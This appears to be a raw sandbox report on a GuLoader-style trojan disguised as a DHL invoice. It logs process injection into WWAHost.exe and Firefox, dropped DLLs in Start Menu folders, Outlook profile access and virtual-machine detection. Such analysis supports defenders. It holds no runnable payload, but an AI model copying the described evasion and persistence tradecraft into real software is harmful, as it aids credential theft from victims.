Source: C:\Windows\SysWOW64\WWAHost.exe	Code function: 5_2_04022BE0 NtQueryVirtualMemory,	5_2_04022BE0
Source: C:\Windows\SysWOW64\WWAHost.exe	Code function: 5_2_02D4C7E0 NtReadFile,	5_2_02D4C7E0
Source: C:\Windows\SysWOW64\WWAHost.exe	Code function: 5_2_02D4C730 NtCreateFile,	5_2_02D4C730
Source: C:\Windows\SysWOW64\WWAHost.exe	Code function: 5_2_02D4C860 NtClose,	5_2_02D4C860
Source: C:\Windows\SysWOW64\WWAHost.exe	Code function: 5_2_02D4C830 NtDeleteFile,	5_2_02D4C830
Source: C:\Windows\SysWOW64\WWAHost.exe	Code function: 5_2_02D4C910 NtAllocateVirtualMemory,	5_2_02D4C910
Source: C:\Windows\SysWOW64\WWAHost.exe	Code function: 5_2_02D4C72A NtCreateFile,	5_2_02D4C72A

Source: DHL-INVOICE-MBV.exe, 00000001.00000003.17542927393.0000000002913000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameSystem.Runtime.Extensions.dll@ vs DHL-INVOICE-MBV.exe
Source: DHL-INVOICE-MBV.exe, 00000001.00000003.17540777299.000000000291E000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameAutoConnectHelper.exeD vs DHL-INVOICE-MBV.exe
Source: DHL-INVOICE-MBV.exe, 00000003.00000002.18151850135.000000001DA40000.00000040.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilenamentdll.dllj% vs DHL-INVOICE-MBV.exe
Source: DHL-INVOICE-MBV.exe, 00000003.00000003.17963292871.000000001D529000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilenamentdll.dllj% vs DHL-INVOICE-MBV.exe
Source: DHL-INVOICE-MBV.exe, 00000003.00000002.18149218359.000000001D89D000.00000040.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilenamentdll.dllj% vs DHL-INVOICE-MBV.exe
Source: DHL-INVOICE-MBV.exe, 00000003.00000002.18126851176.0000000000180000.00000040.10000000.00040000.00000000.sdmp	Binary or memory string: OriginalFilenameWWAHost.exej% vs DHL-INVOICE-MBV.exe
Source: DHL-INVOICE-MBV.exe, 00000003.00000003.17969096422.000000001D6EA000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilenamentdll.dllj% vs DHL-INVOICE-MBV.exe
Source: DHL-INVOICE-MBV.exe, 00000003.00000003.18122021366.000000001D66F000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameWWAHost.exej% vs DHL-INVOICE-MBV.exe
Source: DHL-INVOICE-MBV.exe, 00000003.00000003.18117164589.00000000000C1000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameWWAHost.exej% vs DHL-INVOICE-MBV.exe

Source: C:\Users\user\Desktop\DHL-INVOICE-MBV.exe	Section loaded: edgegdi.dll	Jump to behavior
Source: C:\Users\user\Desktop\DHL-INVOICE-MBV.exe	Section loaded: edgegdi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WWAHost.exe	Section loaded: edgegdi.dll	Jump to behavior

Source: DHL-INVOICE-MBV.exe	Virustotal: Detection: 27%
Source: DHL-INVOICE-MBV.exe	ReversingLabs: Detection: 30%

Source: C:\Users\user\Desktop\DHL-INVOICE-MBV.exe

File read: C:\Users\user\Desktop\DHL-INVOICE-MBV.exe

Jump to behavior

Source: DHL-INVOICE-MBV.exe

Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ

Source: C:\Users\user\Desktop\DHL-INVOICE-MBV.exe

Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Jump to behavior

Source: unknown	Process created: C:\Users\user\Desktop\DHL-INVOICE-MBV.exe C:\Users\user\Desktop\DHL-INVOICE-MBV.exe
Source: C:\Users\user\Desktop\DHL-INVOICE-MBV.exe	Process created: C:\Users\user\Desktop\DHL-INVOICE-MBV.exe C:\Users\user\Desktop\DHL-INVOICE-MBV.exe
Source: C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exe	Process created: C:\Windows\SysWOW64\WWAHost.exe C:\Windows\SysWOW64\WWAHost.exe
Source: C:\Windows\SysWOW64\WWAHost.exe	Process created: C:\Program Files\Mozilla Firefox\firefox.exe C:\Program Files\Mozilla Firefox\Firefox.exe
Source: C:\Users\user\Desktop\DHL-INVOICE-MBV.exe	Process created: C:\Users\user\Desktop\DHL-INVOICE-MBV.exe C:\Users\user\Desktop\DHL-INVOICE-MBV.exe	Jump to behavior
Source: C:\Windows\SysWOW64\WWAHost.exe	Process created: C:\Program Files\Mozilla Firefox\firefox.exe C:\Program Files\Mozilla Firefox\Firefox.exe	Jump to behavior

Source: C:\Users\user\Desktop\DHL-INVOICE-MBV.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{1f486a52-3cb1-48fd-8f50-b8dc300d9f9d}\InProcServer32

Jump to behavior

Source: C:\Users\user\Desktop\DHL-INVOICE-MBV.exe

1_2_00403359

Source: C:\Users\user\Desktop\DHL-INVOICE-MBV.exe

File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\unclinical

Jump to behavior

Source: C:\Users\user\Desktop\DHL-INVOICE-MBV.exe

File created: C:\Users\user\AppData\Local\Temp\nsm371E.tmp

Jump to behavior

Source: classification engine

Classification label: mal100.troj.spyw.evad.winEXE@6/6@20/18

Source: C:\Users\user\Desktop\DHL-INVOICE-MBV.exe

Code function: 1_2_00402104 CoCreateInstance,

1_2_00402104

Source: C:\Users\user\Desktop\DHL-INVOICE-MBV.exe

File read: C:\Users\desktop.ini

Jump to behavior

Source: C:\Users\user\Desktop\DHL-INVOICE-MBV.exe

Code function: 1_2_004046EC GetDlgItem,SetWindowTextW,SHBrowseForFolderW,CoTaskMemFree,lstrcmpiW,lstrcatW,SetDlgItemTextW,GetDiskFreeSpaceW,MulDiv,SetDlgItemTextW,

1_2_004046EC

Source: e216404J.5.dr

Binary or memory string: CREATE TABLE "autofill_profile_edge_extended" ( guid VARCHAR PRIMARY KEY, date_of_birth_day VARCHAR, date_of_birth_month VARCHAR, date_of_birth_year VARCHAR, source INTEGER NOT NULL DEFAULT 0, source_id VARCHAR)[;

Source: C:\Windows\SysWOW64\WWAHost.exe

Key opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\15.0\Outlook\Profiles\Outlook\

Jump to behavior

Source: DHL-INVOICE-MBV.exe

Static PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE

Source:	Binary string: WWAHost.pdb source: DHL-INVOICE-MBV.exe, 00000003.00000002.18125827391.00000000000C0000.00000040.10000000.00040000.00000000.sdmp, DHL-INVOICE-MBV.exe, 00000003.00000003.18117164589.00000000000C1000.00000004.00000800.00020000.00000000.sdmp, DHL-INVOICE-MBV.exe, 00000003.00000003.18120240513.000000001D5AF000.00000004.00000800.00020000.00000000.sdmp
Source:	Binary string: mshtml.pdb source: DHL-INVOICE-MBV.exe, 00000003.00000001.17791517767.0000000000649000.00000008.00000001.01000000.00000006.sdmp
Source:	Binary string: WWAHost.pdbUGP source: DHL-INVOICE-MBV.exe, 00000003.00000002.18125827391.00000000000C0000.00000040.10000000.00040000.00000000.sdmp, DHL-INVOICE-MBV.exe, 00000003.00000003.18117164589.00000000000C1000.00000004.00000800.00020000.00000000.sdmp, DHL-INVOICE-MBV.exe, 00000003.00000003.18120240513.000000001D5AF000.00000004.00000800.00020000.00000000.sdmp
Source:	Binary string: wntdll.pdbUGP source: DHL-INVOICE-MBV.exe, 00000003.00000003.17961194797.000000001D406000.00000004.00000800.00020000.00000000.sdmp, DHL-INVOICE-MBV.exe, 00000003.00000002.18146591431.000000001D770000.00000040.00000800.00020000.00000000.sdmp, DHL-INVOICE-MBV.exe, 00000003.00000003.17967006381.000000001D5BD000.00000004.00000800.00020000.00000000.sdmp, DHL-INVOICE-MBV.exe, 00000003.00000002.18149218359.000000001D89D000.00000040.00000800.00020000.00000000.sdmp, WWAHost.exe, 00000005.00000002.22570082825.0000000003FB0000.00000040.00000800.00020000.00000000.sdmp, WWAHost.exe, 00000005.00000003.18125076626.0000000003C60000.00000004.00000800.00020000.00000000.sdmp, WWAHost.exe, 00000005.00000003.18130223781.0000000003E06000.00000004.00000800.00020000.00000000.sdmp, WWAHost.exe, 00000005.00000002.22574834601.00000000040DD000.00000040.00000800.00020000.00000000.sdmp
Source:	Binary string: wntdll.pdb source: DHL-INVOICE-MBV.exe, DHL-INVOICE-MBV.exe, 00000003.00000003.17961194797.000000001D406000.00000004.00000800.00020000.00000000.sdmp, DHL-INVOICE-MBV.exe, 00000003.00000002.18146591431.000000001D770000.00000040.00000800.00020000.00000000.sdmp, DHL-INVOICE-MBV.exe, 00000003.00000003.17967006381.000000001D5BD000.00000004.00000800.00020000.00000000.sdmp, DHL-INVOICE-MBV.exe, 00000003.00000002.18149218359.000000001D89D000.00000040.00000800.00020000.00000000.sdmp, WWAHost.exe, WWAHost.exe, 00000005.00000002.22570082825.0000000003FB0000.00000040.00000800.00020000.00000000.sdmp, WWAHost.exe, 00000005.00000003.18125076626.0000000003C60000.00000004.00000800.00020000.00000000.sdmp, WWAHost.exe, 00000005.00000003.18130223781.0000000003E06000.00000004.00000800.00020000.00000000.sdmp, WWAHost.exe, 00000005.00000002.22574834601.00000000040DD000.00000040.00000800.00020000.00000000.sdmp
Source:	Binary string: mshtml.pdbUGP source: DHL-INVOICE-MBV.exe, 00000003.00000001.17791517767.0000000000649000.00000008.00000001.01000000.00000006.sdmp
Source:	Binary string: D:\a\_work\1\s\artifacts\obj\System.Runtime.Extensions\net6.0-Release\System.Runtime.Extensions.pdb source: DHL-INVOICE-MBV.exe, 00000001.00000003.17542927393.0000000002913000.00000004.00000800.00020000.00000000.sdmp, System.Runtime.Extensions.dll.1.dr
Source:	Binary string: D:\SourceCode\GC3.MobileControl\production_V4.2\Service\AutoConnectHelper\obj\Release\AutoConnectHelper.pdb source: DHL-INVOICE-MBV.exe, 00000001.00000003.17540777299.000000000291E000.00000004.00000800.00020000.00000000.sdmp, AutoConnectHelper.exe.1.dr
Source:	Binary string: firefox.pdb source: WWAHost.exe, 00000005.00000003.18734956473.000000000922F000.00000004.00000800.00020000.00000000.sdmp, WWAHost.exe, 00000005.00000003.18673165221.00000000087F2000.00000004.00000800.00020000.00000000.sdmp
Source:	Binary string: D:\a\_work\1\s\artifacts\obj\System.Runtime.Extensions\net6.0-Release\System.Runtime.Extensions.pdb`3~3 p3_CorDllMainmscoree.dll source: DHL-INVOICE-MBV.exe, 00000001.00000003.17542927393.0000000002913000.00000004.00000800.00020000.00000000.sdmp, System.Runtime.Extensions.dll.1.dr

Data Obfuscation

Yara detected GuLoader

Source: Yara match	File source: 00000001.00000002.17985889922.0000000003279000.00000040.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000000.17788417365.0000000001660000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY

Source: C:\Users\user\Desktop\DHL-INVOICE-MBV.exe	Code function: 1_2_74112FD0 push eax; ret	1_2_74112FFE
Source: C:\Users\user\Desktop\DHL-INVOICE-MBV.exe	Code function: 1_2_03283879 push edx; retn 0005h	1_2_03283A68
Source: C:\Users\user\Desktop\DHL-INVOICE-MBV.exe	Code function: 1_2_0327E74D push FFFFFFB9h; retf	1_2_0327E754
Source: C:\Users\user\Desktop\DHL-INVOICE-MBV.exe	Code function: 1_2_032813BA push esp; iretd	1_2_032813BB
Source: C:\Users\user\Desktop\DHL-INVOICE-MBV.exe	Code function: 1_2_0327AFF7 push esp; retf	1_2_0327B018
Source: C:\Users\user\Desktop\DHL-INVOICE-MBV.exe	Code function: 1_2_0327E7C2 push FFFFFFB9h; retf	1_2_0327E7C9
Source: C:\Users\user\Desktop\DHL-INVOICE-MBV.exe	Code function: 1_2_032813D3 push esp; iretd	1_2_032813D4
Source: C:\Users\user\Desktop\DHL-INVOICE-MBV.exe	Code function: 1_2_032812BF push esi; ret	1_2_032812C1
Source: C:\Users\user\Desktop\DHL-INVOICE-MBV.exe	Code function: 1_2_0327CE95 push esi; retf	1_2_0327CE96
Source: C:\Users\user\Desktop\DHL-INVOICE-MBV.exe	Code function: 1_2_0327E6FF push FFFFFFB9h; retf	1_2_0327E706
Source: C:\Users\user\Desktop\DHL-INVOICE-MBV.exe	Code function: 1_2_0328398D push edx; retn 0005h	1_2_03283A68
Source: C:\Users\user\Desktop\DHL-INVOICE-MBV.exe	Code function: 1_2_0328402D pushad ; retf	1_2_032846F4
Source: C:\Users\user\Desktop\DHL-INVOICE-MBV.exe	Code function: 1_2_0328147B push esp; iretd	1_2_0328147C
Source: C:\Users\user\Desktop\DHL-INVOICE-MBV.exe	Code function: 1_2_0327B897 push ds; retf	1_2_0327B8BD
Source: C:\Users\user\Desktop\DHL-INVOICE-MBV.exe	Code function: 1_2_03281494 push esp; iretd	1_2_03281495
Source: C:\Users\user\Desktop\DHL-INVOICE-MBV.exe	Code function: 1_2_032838C0 push edx; retn 0005h	1_2_03283A68
Source: C:\Users\user\Desktop\DHL-INVOICE-MBV.exe	Code function: 1_2_032838D8 push edx; retn 0005h	1_2_03283A68
Source: C:\Users\user\Desktop\DHL-INVOICE-MBV.exe	Code function: 1_2_0327CCD3 push ss; iretd	1_2_0327CCD4
Source: C:\Users\user\Desktop\DHL-INVOICE-MBV.exe	Code function: 3_2_1D7A08CD push ecx; mov dword ptr [esp], ecx	3_2_1D7A08D6
Source: C:\Users\user\Desktop\DHL-INVOICE-MBV.exe	Code function: 3_2_1D7797A1 push es; iretd	3_2_1D7797A8
Source: C:\Users\user\Desktop\DHL-INVOICE-MBV.exe	Code function: 3_2_1D7721AD pushad ; retf 0004h	3_2_1D77223F
Source: C:\Windows\SysWOW64\WWAHost.exe	Code function: 5_2_03FE08CD push ecx; mov dword ptr [esp], ecx	5_2_03FE08D6
Source: C:\Windows\SysWOW64\WWAHost.exe	Code function: 5_2_02D48297 push 00000007h; ret	5_2_02D4829E
Source: C:\Windows\SysWOW64\WWAHost.exe	Code function: 5_2_02D4827D push 00000007h; ret	5_2_02D4829E
Source: C:\Windows\SysWOW64\WWAHost.exe	Code function: 5_2_02D50056 push ds; retf	5_2_02D50057
Source: C:\Windows\SysWOW64\WWAHost.exe	Code function: 5_2_02D3B8CB push ss; iretd	5_2_02D3B8CD
Source: C:\Windows\SysWOW64\WWAHost.exe	Code function: 5_2_02D468B6 push esp; ret	5_2_02D468B8
Source: C:\Windows\SysWOW64\WWAHost.exe	Code function: 5_2_02D48869 push 7DC3C495h; iretd	5_2_02D48878
Source: C:\Windows\SysWOW64\WWAHost.exe	Code function: 5_2_02D4F9DC push eax; ret	5_2_02D4F9E2
Source: C:\Windows\SysWOW64\WWAHost.exe	Code function: 5_2_02D4F972 push eax; ret	5_2_02D4F978
Source: C:\Windows\SysWOW64\WWAHost.exe	Code function: 5_2_02D4F97B push eax; ret	5_2_02D4F9E2

Source: liboscar.dll.1.dr

Static PE information: section name: /4

Source: C:\Users\user\Desktop\DHL-INVOICE-MBV.exe

Code function: 1_2_74111B63 GlobalAlloc,lstrcpyW,lstrcpyW,GlobalFree,GlobalFree,GlobalFree,GlobalFree,GlobalFree,GlobalFree,lstrcpyW,GetModuleHandleW,LoadLibraryW,GetProcAddress,lstrlenW,

1_2_74111B63

Source: System.Runtime.Extensions.dll.1.dr

Static PE information: 0xAD8DCB42 [Sat Apr 8 19:42:58 2062 UTC]

Source: C:\Users\user\Desktop\DHL-INVOICE-MBV.exe	File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\unclinical\underexposures\Teoretiseret\moeurs\System.Runtime.Extensions.dll	Jump to dropped file
Source: C:\Users\user\Desktop\DHL-INVOICE-MBV.exe	File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\unclinical\Mystificerede5\Montia\Sbeskummet\Gtevielsers22\liboscar.dll	Jump to dropped file
Source: C:\Users\user\Desktop\DHL-INVOICE-MBV.exe	File created: C:\Users\user\AppData\Local\Temp\nsd3A3C.tmp\System.dll	Jump to dropped file
Source: C:\Users\user\Desktop\DHL-INVOICE-MBV.exe	File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\unclinical\underexposures\Teoretiseret\moeurs\AutoConnectHelper.exe	Jump to dropped file

Source: C:\Users\user\Desktop\DHL-INVOICE-MBV.exe	File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\unclinical	Jump to behavior
Source: C:\Users\user\Desktop\DHL-INVOICE-MBV.exe	File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\unclinical\underexposures	Jump to behavior
Source: C:\Users\user\Desktop\DHL-INVOICE-MBV.exe	File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\unclinical\underexposures\Teoretiseret	Jump to behavior
Source: C:\Users\user\Desktop\DHL-INVOICE-MBV.exe	File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\unclinical\underexposures\Teoretiseret\moeurs	Jump to behavior
Source: C:\Users\user\Desktop\DHL-INVOICE-MBV.exe	File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\unclinical\underexposures\Teoretiseret\moeurs\Terrestriske.bmp	Jump to behavior
Source: C:\Users\user\Desktop\DHL-INVOICE-MBV.exe	File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\unclinical\underexposures\Teoretiseret\moeurs\AutoConnectHelper.exe	Jump to behavior
Source: C:\Users\user\Desktop\DHL-INVOICE-MBV.exe	File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\unclinical\underexposures\Teoretiseret\moeurs\System.Runtime.Extensions.dll	Jump to behavior
Source: C:\Users\user\Desktop\DHL-INVOICE-MBV.exe	File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\unclinical\Mystificerede5	Jump to behavior
Source: C:\Users\user\Desktop\DHL-INVOICE-MBV.exe	File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\unclinical\Mystificerede5\Montia	Jump to behavior
Source: C:\Users\user\Desktop\DHL-INVOICE-MBV.exe	File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\unclinical\Mystificerede5\Montia\Sbeskummet	Jump to behavior
Source: C:\Users\user\Desktop\DHL-INVOICE-MBV.exe	File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\unclinical\Mystificerede5\Montia\Sbeskummet\Gtevielsers22	Jump to behavior
Source: C:\Users\user\Desktop\DHL-INVOICE-MBV.exe	File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\unclinical\Mystificerede5\Montia\Sbeskummet\Gtevielsers22\liboscar.dll	Jump to behavior

Source: C:\Users\user\Desktop\DHL-INVOICE-MBV.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\DHL-INVOICE-MBV.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\DHL-INVOICE-MBV.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WWAHost.exe	Process information set: NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WWAHost.exe	Process information set: NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WWAHost.exe	Process information set: NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WWAHost.exe	Process information set: NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WWAHost.exe	Process information set: NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX	Jump to behavior

Malware Analysis System Evasion

Tries to detect Any.run

Source: C:\Users\user\Desktop\DHL-INVOICE-MBV.exe	File opened: C:\Program Files\Qemu-ga\qemu-ga.exe	Jump to behavior
Source: C:\Users\user\Desktop\DHL-INVOICE-MBV.exe	File opened: C:\Program Files\qga\qga.exe	Jump to behavior
Source: C:\Users\user\Desktop\DHL-INVOICE-MBV.exe	File opened: C:\Program Files\Qemu-ga\qemu-ga.exe	Jump to behavior
Source: C:\Users\user\Desktop\DHL-INVOICE-MBV.exe	File opened: C:\Program Files\qga\qga.exe	Jump to behavior

Source: C:\Windows\SysWOW64\WWAHost.exe TID: 4972	Thread sleep count: 111 > 30	Jump to behavior
Source: C:\Windows\SysWOW64\WWAHost.exe TID: 4972	Thread sleep time: -222000s >= -30000s	Jump to behavior
Source: C:\Windows\explorer.exe TID: 4808	Thread sleep count: 32 > 30	Jump to behavior
Source: C:\Windows\explorer.exe TID: 4808	Thread sleep time: -160000s >= -30000s	Jump to behavior
Source: C:\Windows\explorer.exe TID: 4808	Thread sleep count: 86 > 30	Jump to behavior
Source: C:\Windows\explorer.exe TID: 4808	Thread sleep time: -86000s >= -30000s	Jump to behavior
Source: C:\Windows\explorer.exe TID: 4808	Thread sleep count: 87 > 30	Jump to behavior
Source: C:\Windows\explorer.exe TID: 4808	Thread sleep time: -87000s >= -30000s	Jump to behavior

Source: C:\Windows\SysWOW64\WWAHost.exe	Last function: Thread delayed
Source: C:\Windows\SysWOW64\WWAHost.exe	Last function: Thread delayed

Source: C:\Users\user\Desktop\DHL-INVOICE-MBV.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\unclinical\underexposures\Teoretiseret\moeurs\System.Runtime.Extensions.dll	Jump to dropped file
Source: C:\Users\user\Desktop\DHL-INVOICE-MBV.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\unclinical\Mystificerede5\Montia\Sbeskummet\Gtevielsers22\liboscar.dll	Jump to dropped file
Source: C:\Users\user\Desktop\DHL-INVOICE-MBV.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\unclinical\underexposures\Teoretiseret\moeurs\AutoConnectHelper.exe	Jump to dropped file

Source: C:\Users\user\Desktop\DHL-INVOICE-MBV.exe

Code function: 1_2_03279F0F rdtsc

1_2_03279F0F

Source: C:\Users\user\Desktop\DHL-INVOICE-MBV.exe	API coverage: 1.1 %
Source: C:\Windows\SysWOW64\WWAHost.exe	API coverage: 2.7 %

Source: C:\Users\user\Desktop\DHL-INVOICE-MBV.exe

Process information queried: ProcessInformation

Jump to behavior

Source: C:\Users\user\Desktop\DHL-INVOICE-MBV.exe	Code function: 1_2_004065C7 FindFirstFileW,FindClose,	1_2_004065C7
Source: C:\Users\user\Desktop\DHL-INVOICE-MBV.exe	Code function: 1_2_00405996 GetTempPathW,DeleteFileW,lstrcatW,lstrcatW,lstrlenW,FindFirstFileW,FindNextFileW,FindClose,	1_2_00405996
Source: C:\Users\user\Desktop\DHL-INVOICE-MBV.exe	Code function: 1_2_00402868 FindFirstFileW,	1_2_00402868
Source: C:\Windows\SysWOW64\WWAHost.exe	Code function: 5_2_02D42C70 FindFirstFileW,FindNextFileW,FindClose,	5_2_02D42C70

Source: C:\Users\user\Desktop\DHL-INVOICE-MBV.exe

System information queried: ModuleInformation

Jump to behavior

Source: C:\Users\user\Desktop\DHL-INVOICE-MBV.exe	API call chain: ExitProcess graph end node			graph_1-10444
Source: C:\Users\user\Desktop\DHL-INVOICE-MBV.exe	API call chain: ExitProcess graph end node			graph_1-10598

Source: DHL-INVOICE-MBV.exe, 00000001.00000002.17987139516.0000000004EE9000.00000004.00000800.00020000.00000000.sdmp, DHL-INVOICE-MBV.exe, 00000003.00000002.18129046474.0000000003459000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Hyper-V Guest Shutdown Service
Source: DHL-INVOICE-MBV.exe, 00000001.00000002.17987139516.0000000004EE9000.00000004.00000800.00020000.00000000.sdmp, DHL-INVOICE-MBV.exe, 00000003.00000002.18129046474.0000000003459000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Hyper-V Remote Desktop Virtualization Service
Source: DHL-INVOICE-MBV.exe, 00000003.00000002.18129046474.0000000003459000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: vmicshutdown
Source: DHL-INVOICE-MBV.exe, 00000001.00000002.17987139516.0000000004EE9000.00000004.00000800.00020000.00000000.sdmp, DHL-INVOICE-MBV.exe, 00000003.00000002.18129046474.0000000003459000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Hyper-V Volume Shadow Copy Requestor
Source: DHL-INVOICE-MBV.exe, 00000003.00000003.17964385478.0000000001855000.00000004.00000020.00020000.00000000.sdmp, DHL-INVOICE-MBV.exe, 00000003.00000002.18128518753.0000000001855000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAWO
Source: explorer.exe, 0000000A.00000000.18384512386.0000000010108000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000000.18445785879.0000000010108000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000000.18262386087.0000000010108000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000000.18508635819.0000000010108000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAWp
Source: DHL-INVOICE-MBV.exe, 00000001.00000002.17987139516.0000000004EE9000.00000004.00000800.00020000.00000000.sdmp, DHL-INVOICE-MBV.exe, 00000003.00000002.18129046474.0000000003459000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Hyper-V PowerShell Direct Service
Source: DHL-INVOICE-MBV.exe, 00000001.00000002.17987139516.0000000004EE9000.00000004.00000800.00020000.00000000.sdmp, DHL-INVOICE-MBV.exe, 00000003.00000002.18129046474.0000000003459000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Hyper-V Time Synchronization Service
Source: DHL-INVOICE-MBV.exe, 00000003.00000002.18129046474.0000000003459000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: vmicvss
Source: DHL-INVOICE-MBV.exe, 00000003.00000003.17964385478.0000000001855000.00000004.00000020.00020000.00000000.sdmp, DHL-INVOICE-MBV.exe, 00000003.00000002.18128518753.0000000001855000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000A.00000000.18508495094.00000000100F6000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000000.18384987397.000000001014A000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000000.18262200880.00000000100F6000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000000.18509395699.000000001014A000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000000.18384352679.00000000100F6000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000000.18445655355.00000000100F6000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000000.18263203602.000000001014A000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW
Source: DHL-INVOICE-MBV.exe, 00000003.00000002.18127988183.0000000001814000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW(
Source: DHL-INVOICE-MBV.exe, 00000001.00000002.17987139516.0000000004EE9000.00000004.00000800.00020000.00000000.sdmp, DHL-INVOICE-MBV.exe, 00000003.00000002.18129046474.0000000003459000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Hyper-V Data Exchange Service
Source: DHL-INVOICE-MBV.exe, 00000001.00000002.17987139516.0000000004EE9000.00000004.00000800.00020000.00000000.sdmp, DHL-INVOICE-MBV.exe, 00000003.00000002.18129046474.0000000003459000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Hyper-V Heartbeat Service
Source: DHL-INVOICE-MBV.exe, 00000001.00000002.17987139516.0000000004EE9000.00000004.00000800.00020000.00000000.sdmp, DHL-INVOICE-MBV.exe, 00000003.00000002.18129046474.0000000003459000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Hyper-V Guest Service Interface
Source: DHL-INVOICE-MBV.exe, 00000003.00000002.18129046474.0000000003459000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: vmicheartbeat
Source: firefox.exe, 0000000B.00000002.18743108817.0000025F0E4D2000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll

Source: C:\Users\user\Desktop\DHL-INVOICE-MBV.exe

Code function: 1_2_74111B63 GlobalAlloc,lstrcpyW,lstrcpyW,GlobalFree,GlobalFree,GlobalFree,GlobalFree,GlobalFree,GlobalFree,lstrcpyW,GetModuleHandleW,LoadLibraryW,GetProcAddress,lstrlenW,

1_2_74111B63

Source: C:\Users\user\Desktop\DHL-INVOICE-MBV.exe

Code function: 1_2_03279F0F rdtsc

1_2_03279F0F

Source: C:\Users\user\Desktop\DHL-INVOICE-MBV.exe

Process token adjusted: Debug

Jump to behavior

Source: C:\Users\user\Desktop\DHL-INVOICE-MBV.exe	Code function: 1_2_03291F33 mov eax, dword ptr fs:[00000030h]	1_2_03291F33
Source: C:\Users\user\Desktop\DHL-INVOICE-MBV.exe	Code function: 1_2_03281B84 mov eax, dword ptr fs:[00000030h]	1_2_03281B84
Source: C:\Users\user\Desktop\DHL-INVOICE-MBV.exe	Code function: 1_2_03281E1F mov eax, dword ptr fs:[00000030h]	1_2_03281E1F
Source: C:\Users\user\Desktop\DHL-INVOICE-MBV.exe	Code function: 1_2_03281AAA mov eax, dword ptr fs:[00000030h]	1_2_03281AAA
